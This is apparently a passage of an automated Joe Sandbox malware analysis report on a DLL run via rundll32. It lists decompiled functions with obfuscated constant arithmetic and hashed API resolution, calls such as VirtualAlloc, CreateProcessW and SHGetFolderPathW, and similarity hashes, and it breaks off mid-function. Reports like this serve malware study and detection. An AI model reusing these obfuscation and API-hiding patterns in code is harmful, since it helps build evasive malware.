				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t49;
				int _t63;
				signed int _t65;
				signed int _t66;

				_push(_a8);
				_push(_a4);
				E10017B8C(_t49);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x6d740e;
				_v28 = 0x43ca31;
				_v8 = 0xde52;
				_v8 = _v8 + 0xffff302d;
				_t65 = 0x73;
				_v8 = _v8 / _t65;
				_t66 = 0x33;
				_v8 = _v8 * 0x3f;
				_v8 = _v8 ^ 0x00005145;
				_v16 = 0xb51c;
				_v16 = _v16 * 0x19;
				_v16 = _v16 ^ 0x573bb19d;
				_v16 = _v16 ^ 0x572a283c;
				_v12 = 0xa3c7;
				_v12 = _v12 / _t66;
				_v12 = _v12 * 0x3f;
				_v12 = _v12 ^ 0x0000bd7b;
				_v20 = 0x5d2c;
				_v20 = _v20 ^ 0x811e33c3;
				_v20 = _v20 ^ 0x811e27aa;
				E10004010(_t66, 0xac2d26d8, 0x79, _t66, 0xd964d70b);
				_t63 = lstrcmpiW(_a4, _a8); // executed
				return _t63;
			}

0x10001ba3
0x10001ba6
0x10001bab
0x10001bb0
0x10001bb6
0x10001bbd
0x10001bc4
0x10001bcb
0x10001bd7
0x10001bdc
0x10001be5
0x10001be9
0x10001bec
0x10001bf3
0x10001c06
0x10001c09
0x10001c10
0x10001c17
0x10001c28
0x10001c2f
0x10001c32
0x10001c39
0x10001c40
0x10001c47
0x10001c5a
0x10001c68
0x10001c6d

APIs

lstrcmpiW.KERNELBASE(0000BD7B,572A283C), ref: 10001C68

Strings

<(*W, xrefs: 10001C10

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: <(*W
API String ID: 1586166983-931366690
Opcode ID: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
Instruction ID: 5c987274e65c3c22dfdbb34c56d7d9efcbdc8bc590f707738c434fd9af89b748
Opcode Fuzzy Hash: 79c9eacbb9d446e0444c777dfc7be36fec9ace95d4ad31c2aba0456db5e49aa4
Instruction Fuzzy Hash: 062120B5D00208EFDB04CFE4C98A99EBBB1EB44304F10C08AE414AB2A0D7B99B419F90

Uniqueness

Uniqueness Score: -1.00%

Function 0022F550, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0022F5D4

Strings

VirtualAlloc, xrefs: 0022F5B9, 0022F5BC

Memory Dump Source

Source File: 00000007.00000002.2110565424.0000000000210000.00000040.00000001.sdmp, Offset: 00210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_210000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction ID: f3542f9d9ba53c8add7a4538b46ceb8940f3fa1a8df8dd51bc6d80dd2cccff51
Opcode Fuzzy Hash: cbc1899fc605ed958cc086a5dc4e7f1b82cb752ceb3f41a723dcb0bfcbc38235
Instruction Fuzzy Hash: E1114260D082CDEEEF01DBE8D4097EFBFB55F11704F0440A8E5446B282D2BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Function 10019C80, Relevance: 1.6, APIs: 1, Instructions: 82
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E10019C80(struct _PROCESS_INFORMATION* __ecx, WCHAR* __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a24, struct _STARTUPINFOW* _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, int _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t53;
				int _t64;
				signed int _t67;
				signed int _t68;
				WCHAR* _t75;
				struct _PROCESS_INFORMATION* _t76;

				_t75 = __edx;
				_push(0);
				_push(_a68);
				_t76 = __ecx;
				_push(_a64);
				_push(_a60);
				_push(_a56);
				_push(0);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(0);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E10017B8C(_t53);
				_v12 = 0x6630;
				_t67 = 0x77;
				_v12 = _v12 / _t67;
				_v12 = _v12 ^ 0x714ffcce;
				_v12 = _v12 ^ 0x714f8e45;
				_v8 = 0x1428;
				_v8 = _v8 >> 0xf;
				_t68 = 0x7f;
				_v8 = _v8 / _t68;
				_v8 = _v8 ^ 0x00007a2e;
				_v20 = 0x48d2;
				_v20 = _v20 + 0xab8a;
				_v20 = _v20 ^ 0x0000b473;
				_v16 = 0x6e9f;
				_v16 = _v16 + 0xffff30eb;
				_v16 = _v16 ^ 0xffffa3a6;
				E10004010(_t68, 0xac2d26d8, 0x2b0, _t68, 0xd9f4cde0);
				_t64 = CreateProcessW(_t75, _a8, 0, 0, _a56, 0, 0, 0, _a32, _t76); // executed
				return _t64;
			}

0x10019c8b
0x10019c8d
0x10019c8e
0x10019c91
0x10019c93
0x10019c96
0x10019c99
0x10019c9c
0x10019c9d
0x10019ca0
0x10019ca3
0x10019ca6
0x10019ca9
0x10019cac
0x10019cad
0x10019cb0
0x10019cb1
0x10019cb2
0x10019cb5
0x10019cb8
0x10019cbb
0x10019cbc
0x10019cbd
0x10019cc2
0x10019cd0
0x10019cd5
0x10019cda
0x10019ce1
0x10019ce8
0x10019cef
0x10019cf6
0x10019d01
0x10019d04
0x10019d0b
0x10019d12
0x10019d19
0x10019d20
0x10019d27
0x10019d2e
0x10019d4c
0x10019d64
0x10019d6c

APIs

CreateProcessW.KERNEL32(00000000,FFFFA3A6,00000000,00000000,?,00000000,00000000,00000000,?,F5ADA244), ref: 10019D64

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
Instruction ID: 6f6f4ffef16e4567f02434b93fb23f43c8a1571d2b23c853eb8330a43a9d40a6
Opcode Fuzzy Hash: 2d3afecef0eae13ec00b8db049d1962f0b6ad99aa455ddf0e27f43013b9b1411
Instruction Fuzzy Hash: 6B31F9B690020CBFEF05DE95CD85CEEBB7AFB48354F108089FA1466260D7769E61AB50

Uniqueness

Uniqueness Score: -1.00%

Function 1001BA7B, Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E1001BA7B(void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t43;
				intOrPtr* _t52;
				void* _t53;
				signed int _t54;
				void* _t60;

				_t60 = __edx;
				E10017B8C(_t43);
				_v28 = 0x37183;
				_v24 = 0;
				_v20 = 0xc1e;
				_v20 = _v20 ^ 0x1ddfc436;
				_v20 = _v20 ^ 0x1ddf9af4;
				_v16 = 0xef7f;
				_t54 = 0x45;
				_v16 = _v16 * 0x79;
				_v16 = _v16 >> 2;
				_v16 = _v16 ^ 0x001c4db5;
				_v12 = 0x4c2e;
				_v12 = _v12 << 0xd;
				_v12 = _v12 / _t54;
				_v12 = _v12 ^ 0x00237cb0;
				_v8 = 0xd2af;
				_v8 = _v8 << 5;
				_v8 = _v8 + 0xffffc92f;
				_v8 = _v8 ^ 0x001a0fe8;
				_t52 = E10004010(_t54, 0xeed7a5cf, 0x2d2, _t54, 0x708e2747);
				_t53 =  *_t52(0, _t60, 0, 0, _a20, 0, __edx, 0, _a8, _a12, 0, _a20, _a24, _a28); // executed
				return _t53;
			}

0x1001ba88
0x1001ba9a
0x1001ba9f
0x1001baa8
0x1001baab
0x1001bab2
0x1001bab9
0x1001bac0
0x1001bacd
0x1001bad1
0x1001bad4
0x1001bad8
0x1001badf
0x1001bae6
0x1001baf4
0x1001bafc
0x1001bb03
0x1001bb0a
0x1001bb0e
0x1001bb15
0x1001bb2e
0x1001bb3d
0x1001bb44

APIs

SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00037183,?,?,?,?,?,?,?,?,00000003,1B835AC8,1B835AC8), ref: 1001BB3D

Memory Dump Source

Source File: 00000007.00000002.2111395088.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2111431477.0000000010021000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
Instruction ID: e57e8dc99711bf8f73612d28d45590ecd43cf8e3c82c42321f98dcc01df6ce76
Opcode Fuzzy Hash: b1a1f18e4c2d1cca216e18cf7875c89d58af22bf91d37e0d639e08c95d6c68c0
Instruction Fuzzy Hash: 322134B5D00209BBDB10DFAAC84A8EFBFB8EB95314F108089F924A6250C3B44A55DF91

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10004AD3, Relevance: 56.1, Strings: 44, Instructions: 1101
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E10004AD3() {
				char _v68;
				intOrPtr _v72;
				char _v80;
				char _v88;
				signed int _v92;
				signed int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				void* _v112;
				signed int _v116;
				char _v124;
				char _v132;
				char _v140;
				char _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				unsigned int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				unsigned int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				unsigned int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				unsigned int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				unsigned int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				unsigned int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _t1180;
				signed int _t1187;
				signed int _t1195;
				signed int _t1200;
				signed int _t1259;
				intOrPtr _t1261;
				signed int _t1276;
				signed int _t1288;
				signed int _t1298;
				signed int _t1299;
				signed int _t1308;
				signed int _t1326;
				signed int _t1407;
				signed int _t1408;
				signed int _t1409;
				signed int _t1412;
				signed int _t1413;
				signed int _t1414;
				signed int _t1415;
				signed int _t1416;
				signed int _t1417;
				signed int _t1418;
				signed int _t1419;
				signed int _t1420;
				signed int _t1421;
				signed int _t1422;
				signed int _t1423;
				signed int _t1424;
				signed int _t1425;
				signed int _t1426;
				signed int _t1427;
				signed int _t1428;
				signed int _t1429;
				signed int _t1430;
				signed int _t1431;
				signed int _t1432;
				signed int _t1435;
				signed int _t1438;
				void* _t1440;
				void* _t1441;
				void* _t1447;
				void* _t1448;
				void* _t1449;

				_t1440 = (_t1438 & 0xfffffff8) - 0x270;
				_v292 = 0xf284;
				_v292 = _v292 + 0xffff5aaa;
				_t1302 = 0x16005848;
				_v292 = _v292 ^ 0x00003d27;
				_v612 = 0xcd90;
				_v612 = _v612 + 0xdfca;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 | 0x90102aac;
				_v612 = _v612 ^ 0x901044a1;
				_v344 = 0x729c;
				_v344 = _v344 + 0x2380;
				_v344 = _v344 >> 0xe;
				_v344 = _v344 ^ 0x00007fcb;
				_v452 = 0xe9c6;
				_v452 = _v452 ^ 0x6183925d;
				_v452 = _v452 ^ 0x6183069b;
				_v220 = 0xf7ec;
				_v220 = _v220 + 0xffffa4eb;
				_v220 = _v220 ^ 0x000098b7;
				_v616 = 0xc1ab;
				_v616 = _v616 + 0x495b;
				_t1412 = 6;
				_v616 = _v616 / _t1412;
				_t1298 = 0x33;
				_v616 = _v616 / _t1298;
				_v616 = _v616 ^ 0x00003f24;
				_v172 = 0xc3e5;
				_v172 = _v172 | 0x8c3924a1;
				_v172 = _v172 ^ 0x8c3990dc;
				_v556 = 0xec7;
				_v556 = _v556 + 0xffffdd66;
				_v556 = _v556 | 0xeb06e3e9;
				_v556 = _v556 + 0xffff4ec5;
				_v556 = _v556 ^ 0xffff0d2a;
				_v404 = 0xebd2;
				_v404 = _v404 ^ 0x39abe120;
				_v404 = _v404 + 0xffff117d;
				_v404 = _v404 ^ 0x39aa0261;
				_v608 = 0x5138;
				_t1413 = 0x1b;
				_v608 = _v608 / _t1413;
				_v608 = _v608 | 0x15307ace;
				_v608 = _v608 << 0xe;
				_v608 = _v608 ^ 0x1ef3a051;
				_v348 = 0xfe76;
				_v348 = _v348 + 0xffff3b1c;
				_v348 = _v348 | 0xcb0de786;
				_v348 = _v348 ^ 0xcb0d8d59;
				_v456 = 0x2747;
				_t1414 = 0x7a;
				_v456 = _v456 / _t1414;
				_v456 = _v456 | 0x91302429;
				_v456 = _v456 ^ 0x91303345;
				_v460 = 0xcf3d;
				_t1415 = 0x45;
				_v460 = _v460 / _t1415;
				_v460 = _v460 + 0xeb19;
				_v460 = _v460 ^ 0x0000cda4;
				_v392 = 0x63af;
				_t1416 = 0x5b;
				_v392 = _v392 * 0x33;
				_v392 = _v392 + 0x892;
				_v392 = _v392 ^ 0x0013c32b;
				_v628 = 0x2d41;
				_v628 = _v628 * 0x3a;
				_v628 = _v628 ^ 0x0e465d81;
				_v628 = _v628 ^ 0x02b58f59;
				_v628 = _v628 ^ 0x0cf9d1f3;
				_v332 = 0x1fb8;
				_t1417 = 0x6f;
				_v332 = _v332 / _t1416;
				_v332 = _v332 / _t1417;
				_v332 = _v332 ^ 0x0000375d;
				_v372 = 0xc55d;
				_v372 = _v372 + 0xf0ae;
				_v372 = _v372 | 0xf3912f04;
				_v372 = _v372 ^ 0xf391ae1e;
				_v388 = 0xb177;
				_t1407 = 0x1e;
				_t1435 = 0x54;
				_v388 = _v388 * 0x3b;
				_v388 = _v388 ^ 0xc27fce9c;
				_v388 = _v388 ^ 0xc2577be9;
				_v624 = 0x5c86;
				_v624 = _v624 | 0xeb73bab0;
				_v624 = _v624 >> 0xd;
				_v624 = _v624 ^ 0x5553c051;
				_v624 = _v624 ^ 0x5554cdf2;
				_v508 = 0x7c12;
				_v508 = _v508 ^ 0x4b00f6f6;
				_v508 = _v508 >> 0xb;
				_v508 = _v508 << 3;
				_v508 = _v508 ^ 0x004b3011;
				_v236 = 0xadb3;
				_v236 = _v236 ^ 0x88d42a99;
				_v236 = _v236 ^ 0x88d4f4cf;
				_v156 = 0xd97f;
				_v156 = _v156 << 5;
				_v156 = _v156 ^ 0x001b098b;
				_v412 = 0x73ca;
				_v412 = _v412 >> 5;
				_v412 = _v412 + 0x32d0;
				_v412 = _v412 ^ _t1407;
				_v476 = 0x7179;
				_v476 = _v476 << 9;
				_v476 = _v476 ^ 0xfa6ca94f;
				_v476 = _v476 + 0x29d1;
				_v476 = _v476 ^ 0xfa8edfe4;
				_v168 = 0xea82;
				_v168 = _v168 >> 0xb;
				_v168 = _v168 ^ 0x00004263;
				_v592 = 0x3b0;
				_v592 = _v592 / _t1435;
				_v592 = _v592 >> 7;
				_v592 = _v592 | 0xeae8dba7;
				_v592 = _v592 ^ 0xeae8c36b;
				_v400 = 0xda5d;
				_v400 = _v400 | 0x54ef1ab9;
				_v400 = _v400 + 0x567d;
				_v400 = _v400 ^ 0x54f01593;
				_v328 = 0x7238;
				_v328 = _v328 | 0xde6da7df;
				_v328 = _v328 ^ 0xde6dfc76;
				_v336 = 0x76a2;
				_t1418 = 0x47;
				_t1299 = 0x79;
				_v336 = _v336 * 0x33;
				_v336 = _v336 ^ 0xb9271891;
				_v336 = _v336 ^ 0xb930902f;
				_v252 = 0xfc5c;
				_v252 = _v252 + 0xffff7b0a;
				_v252 = _v252 ^ 0x000016bf;
				_v600 = 0x59dc;
				_v600 = _v600 ^ 0xd5216188;
				_v600 = _v600 + 0x6faa;
				_v600 = _v600 ^ 0x291e786a;
				_v600 = _v600 ^ 0xfc3f8df9;
				_v304 = 0xd5a8;
				_v304 = _v304 >> 2;
				_v304 = _v304 ^ 0x00000b06;
				_v440 = 0x2e48;
				_v440 = _v440 | 0x7b5fcfcf;
				_v440 = _v440 ^ 0x7b5fcc0c;
				_v296 = 0x1656;
				_v296 = _v296 + 0x19e8;
				_v296 = _v296 ^ 0x00001740;
				_v432 = 0x94e4;
				_v432 = _v432 << 0xa;
				_v432 = _v432 | 0x14facc30;
				_v432 = _v432 ^ 0x16fbf4b9;
				_v288 = 0x5427;
				_v288 = _v288 / _t1418;
				_v288 = _v288 ^ 0x00006e86;
				_v408 = 0x8ade;
				_v408 = _v408 + 0xf781;
				_t1419 = 0x68;
				_v408 = _v408 * 0x65;
				_v408 = _v408 ^ 0x00983bbe;
				_v416 = 0xd77e;
				_v416 = _v416 >> 2;
				_v416 = _v416 ^ 0xa14f526e;
				_v416 = _v416 ^ 0xa14f663e;
				_v424 = 0xdc13;
				_v424 = _v424 + 0xffff3088;
				_v424 = _v424 / _t1299;
				_v424 = _v424 ^ 0x000049b1;
				_v548 = 0x2dc5;
				_v548 = _v548 << 1;
				_v548 = _v548 * 0x23;
				_v548 = _v548 / _t1419;
				_v548 = _v548 ^ 0x00004101;
				_v228 = 0x6679;
				_v228 = _v228 + 0x5c36;
				_v228 = _v228 ^ 0x00008779;
				_v180 = 0x5d8;
				_v180 = _v180 << 0xa;
				_v180 = _v180 ^ 0x00175e46;
				_v356 = 0x866;
				_v356 = _v356 + 0x84b7;
				_v356 = _v356 ^ 0x17867601;
				_v356 = _v356 ^ 0x17869b4b;
				_v212 = 0x219f;
				_v212 = _v212 + 0xffffe051;
				_v212 = _v212 ^ 0x00005b6a;
				_v300 = 0xd0f1;
				_v300 = _v300 << 0xa;
				_v300 = _v300 ^ 0x0343ba67;
				_v448 = 0x3730;
				_v448 = _v448 + 0xfffff2a4;
				_v448 = _v448 ^ 0x356978dd;
				_v448 = _v448 ^ 0x3569194c;
				_v176 = 0x2833;
				_v176 = _v176 + 0x33fd;
				_v176 = _v176 ^ 0x00003a89;
				_v380 = 0x5e6a;
				_v380 = _v380 >> 0xf;
				_t1420 = 0x5f;
				_v380 = _v380 / _t1420;
				_v380 = _v380 ^ 0x00002e7c;
				_v540 = 0x71d2;
				_v540 = _v540 | 0x41bfc7d2;
				_v540 = _v540 >> 3;
				_t1421 = 0x55;
				_v540 = _v540 * 0x14;
				_v540 = _v540 ^ 0xa45f84b6;
				_v620 = 0xa14d;
				_v620 = _v620 << 6;
				_v620 = _v620 >> 0xa;
				_v620 = _v620 + 0xffff1a76;
				_v620 = _v620 ^ 0xffff30e0;
				_v312 = 0x44f8;
				_v312 = _v312 * 0x66;
				_v312 = _v312 + 0xfffff488;
				_v312 = _v312 ^ 0x001b0ac9;
				_v248 = 0x99ec;
				_v248 = _v248 >> 0xb;
				_v248 = _v248 ^ 0x0000517f;
				_v484 = 0x5187;
				_v484 = _v484 << 7;
				_v484 = _v484 << 4;
				_v484 = _v484 >> 0xa;
				_v484 = _v484 ^ 0x0000c372;
				_v152 = 0xd5f0;
				_v152 = _v152 + 0xd416;
				_v152 = _v152 ^ 0x00019eb5;
				_v596 = 0x4698;
				_v596 = _v596 >> 9;
				_v596 = _v596 << 0xd;
				_v596 = _v596 * 0x1c;
				_v596 = _v596 ^ 0x007ab5ff;
				_v488 = 0x3d;
				_v488 = _v488 / _t1421;
				_v488 = _v488 ^ 0x90f6b60e;
				_v488 = _v488 + 0xfc83;
				_v488 = _v488 ^ 0x90f7ae77;
				_v496 = 0x4cc6;
				_v496 = _v496 | 0x7f66ffff;
				_v496 = _v496 + 0xac5a;
				_v496 = _v496 ^ 0x7f679bcd;
				_v504 = 0x36dc;
				_v504 = _v504 | 0xa935dbd5;
				_v504 = _v504 << 6;
				_t1422 = 0x4d;
				_v504 = _v504 / _t1422;
				_v504 = _v504 ^ 0x0101ea82;
				_v512 = 0xafcc;
				_v512 = _v512 >> 4;
				_v512 = _v512 + 0x1599;
				_v512 = _v512 << 1;
				_v512 = _v512 ^ 0x00001cfc;
				_v280 = 0x5f4f;
				_v280 = _v280 << 6;
				_v280 = _v280 ^ 0x0017f419;
				_v576 = 0x9d0c;
				_v576 = _v576 + 0xffffe95f;
				_v576 = _v576 ^ 0x4135f5fe;
				_v576 = _v576 + 0xffffc338;
				_v576 = _v576 ^ 0x41355062;
				_v584 = 0x119;
				_v584 = _v584 ^ 0x421a2dfe;
				_v584 = _v584 ^ 0x4c44e97b;
				_t485 =  &_v584; // 0x4c44e97b
				_t1423 = 0x5d;
				_v584 =  *_t485 * 0x1b;
				_v584 = _v584 ^ 0x83fed64b;
				_v436 = 0x6f14;
				_v436 = _v436 << 8;
				_v436 = _v436 + 0xffff9fc8;
				_v436 = _v436 ^ 0x006ee9f0;
				_v316 = 0x7c6b;
				_v316 = _v316 | 0x96cf289b;
				_v316 = _v316 >> 6;
				_v316 = _v316 ^ 0x025b24fa;
				_v468 = 0xb954;
				_v468 = _v468 / _t1423;
				_v468 = _v468 + 0xdc7c;
				_v468 = _v468 << 3;
				_v468 = _v468 ^ 0x0006ccdd;
				_v232 = 0x5848;
				_v232 = _v232 + 0xffff17ce;
				_v232 = _v232 ^ 0xffff11ef;
				_v240 = 0x4315;
				_t1424 = 0x22;
				_v240 = _v240 * 0x5a;
				_v240 = _v240 ^ 0x00179b48;
				_v560 = 0xec5f;
				_v560 = _v560 ^ 0x0798311e;
				_v560 = _v560 << 0xf;
				_v560 = _v560 << 1;
				_v560 = _v560 ^ 0xdd416a99;
				_v568 = 0x48c3;
				_v568 = _v568 | 0x1c7f515b;
				_v568 = _v568 / _t1424;
				_v568 = _v568 + 0xffff9a03;
				_v568 = _v568 ^ 0x00d6643a;
				_v208 = 0x1899;
				_v208 = _v208 + 0x8724;
				_v208 = _v208 ^ 0x00009731;
				_v216 = 0x3d2a;
				_v216 = _v216 + 0xffffdfbc;
				_v216 = _v216 ^ 0x00002f81;
				_v224 = 0xdaeb;
				_v224 = _v224 + 0xffffce17;
				_v224 = _v224 ^ 0x0000d579;
				_v544 = 0xb9be;
				_v544 = _v544 << 4;
				_v544 = _v544 >> 0x10;
				_v544 = _v544 ^ 0x90137b42;
				_v544 = _v544 ^ 0x9013513c;
				_v536 = 0x38b;
				_v536 = _v536 / _t1407;
				_v536 = _v536 >> 1;
				_v536 = _v536 << 0x10;
				_v536 = _v536 ^ 0x000f26d2;
				_v200 = 0x1a59;
				_v200 = _v200 * 0x74;
				_v200 = _v200 ^ 0x000be304;
				_v184 = 0x859e;
				_v184 = _v184 * 0x74;
				_v184 = _v184 ^ 0x003cfb90;
				_v360 = 0x6490;
				_t1425 = 3;
				_v360 = _v360 * 0x72;
				_v360 = _v360 * 0x2a;
				_v360 = _v360 ^ 0x0758d93d;
				_v192 = 0xf868;
				_v192 = _v192 + 0x2bda;
				_v192 = _v192 ^ 0x000152e4;
				_v528 = 0x676;
				_v528 = _v528 | 0x24bb53fd;
				_v528 = _v528 >> 0xe;
				_v528 = _v528 + 0x8306;
				_v528 = _v528 ^ 0x00017f37;
				_v580 = 0x31f4;
				_v580 = _v580 * 0x62;
				_v580 = _v580 + 0x9de5;
				_v580 = _v580 << 0xc;
				_v580 = _v580 ^ 0x3bd4dd01;
				_v164 = 0xa9a7;
				_v164 = _v164 ^ 0xde8baefc;
				_v164 = _v164 ^ 0xde8b4245;
				_v276 = 0xa5ad;
				_v276 = _v276 >> 0xb;
				_v276 = _v276 ^ 0x0000618b;
				_v524 = 0x1681;
				_v524 = _v524 >> 3;
				_v524 = _v524 / _t1425;
				_v524 = _v524 << 7;
				_v524 = _v524 ^ 0x00005671;
				_v492 = 0xe57e;
				_t1426 = 0xb;
				_v492 = _v492 / _t1426;
				_v492 = _v492 | 0x13317d14;
				_v492 = _v492 ^ 0x21db4678;
				_v492 = _v492 ^ 0x32ea4d5a;
				_v196 = 0x20a5;
				_v196 = _v196 ^ 0x7fec11bc;
				_v196 = _v196 ^ 0x7fec059e;
				_v268 = 0xa0f7;
				_v268 = _v268 + 0xffffbbf0;
				_v268 = _v268 ^ 0x00005585;
				_v284 = 0xc44e;
				_t1427 = 0x17;
				_v284 = _v284 / _t1427;
				_v284 = _v284 ^ 0x00000fe6;
				_v588 = 0x9772;
				_v588 = _v588 | 0x0513faeb;
				_v588 = _v588 << 0xc;
				_v588 = _v588 + 0xffffe845;
				_v588 = _v588 ^ 0x3fffb169;
				_v324 = 0x6fd3;
				_v324 = _v324 ^ 0xb7dcb5b3;
				_v324 = _v324 << 0xd;
				_v324 = _v324 ^ 0x9b4c380e;
				_v564 = 0xdada;
				_v564 = _v564 + 0xffffb040;
				_v564 = _v564 ^ 0xc897d1fc;
				_v564 = _v564 >> 0xc;
				_v564 = _v564 ^ 0x000cb45e;
				_v244 = 0x5a23;
				_v244 = _v244 ^ 0xdd4100c5;
				_v244 = _v244 ^ 0xdd41732b;
				_v188 = 0xe772;
				_v188 = _v188 * 0x17;
				_v188 = _v188 ^ 0x0014b7d9;
				_v532 = 0xb034;
				_v532 = _v532 >> 0xb;
				_v532 = _v532 + 0xffffd8d4;
				_v532 = _v532 + 0xffff18c7;
				_v532 = _v532 ^ 0xfffed948;
				_v444 = 0x6a74;
				_v444 = _v444 + 0xffffe81e;
				_v444 = _v444 >> 3;
				_v444 = _v444 ^ 0x00005cb5;
				_v604 = 0xd470;
				_v604 = _v604 + 0xffff4287;
				_t1428 = 0x36;
				_v604 = _v604 * 0x63;
				_v604 = _v604 + 0xa98f;
				_v604 = _v604 ^ 0x0009be15;
				_v500 = 0x6b4b;
				_v500 = _v500 + 0xffff69a2;
				_v500 = _v500 | 0xfafbe3f5;
				_v500 = _v500 ^ 0xffffc820;
				_v256 = 0x3b65;
				_v256 = _v256 + 0x8a1b;
				_v256 = _v256 ^ 0x00009fa9;
				_v264 = 0x8702;
				_v264 = _v264 + 0x22ce;
				_v264 = _v264 ^ 0x0000c9e2;
				_v272 = 0x6ce9;
				_v272 = _v272 + 0xffff741f;
				_v272 = _v272 ^ 0xffff874d;
				_v384 = 0xcfaa;
				_v384 = _v384 ^ 0x7c84390f;
				_v384 = _v384 << 5;
				_v384 = _v384 ^ 0x909ef8fa;
				_v364 = 0xd754;
				_v364 = _v364 + 0x8a6e;
				_v364 = _v364 + 0xffffa77d;
				_v364 = _v364 ^ 0x00012c0a;
				_v572 = 0x684;
				_v572 = _v572 + 0xffff249d;
				_v572 = _v572 + 0xffff11fc;
				_v572 = _v572 ^ 0x2ec24d92;
				_v572 = _v572 ^ 0xd13c5b3a;
				_v260 = 0x9d26;
				_v260 = _v260 + 0xffff77cf;
				_v260 = _v260 ^ 0x00001045;
				_v420 = 0x19b4;
				_v420 = _v420 << 0xe;
				_v420 = _v420 / _t1435;
				_v420 = _v420 ^ 0x001380cf;
				_v472 = 0xb5c1;
				_v472 = _v472 >> 0xe;
				_v472 = _v472 << 6;
				_v472 = _v472 * 0x45;
				_v472 = _v472 ^ 0x00002a12;
				_v480 = 0x152d;
				_v480 = _v480 << 9;
